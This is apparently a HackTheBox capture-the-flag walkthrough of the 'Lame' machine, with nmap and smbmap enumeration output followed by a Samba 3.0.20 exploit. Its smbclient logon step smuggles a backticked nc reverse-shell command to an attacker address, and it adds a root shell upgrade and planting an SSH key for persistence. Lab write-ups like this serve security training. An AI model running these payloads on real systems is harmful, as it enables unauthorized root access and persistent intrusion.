HackTheBox - Lame
Morten Hansen • January 30, 2022
LAME
IP: 10.10.10.3
NMAP
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
#Connect to FTP with
ftp 10.10.10.3
anonymous
But it gives us nothing. We continue to enumerate and try the SMB-server.
nmap --script "safe or smb-enum-*" -p 445 10.10.10.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 16:58 EDT
Pre-scan script results:
| broadcast-dns-service-discovery:
| 224.0.0.251
| 55584/tcp companion-link
|_ Address=172.16.202.1 fe80::10b4:b9cd:52c2:ad33
Get a hold of the SMB-server and the permissions.
smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: lame.hackthebox.gr
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
We discover that the tmp-folder is open for read/write and connect to it with:
smbclient \\\\10.10.10.3\\tmp\\
Inside the folder we can create a reverse connection by using the
logon "/=`nc '10.10.16.4' 4444 -e /bin/bash`"
Make sure to set up a listener in the terminal with nc -lvnp 4444 in order to fetch the reverse connection.
When inside the connection we type whoami and find out that we are root. Then the machine is completed and we can fetch the flags. If we want we can drop our ssh public key inside the /root/.ssh/authorized_keys file and connect to the machine as root using ssh.
In order to get a more usefull shell I use the command python -c "import pty; pty.spawn('/bin/bash')". Since the machine is old we use the python-command and not python3.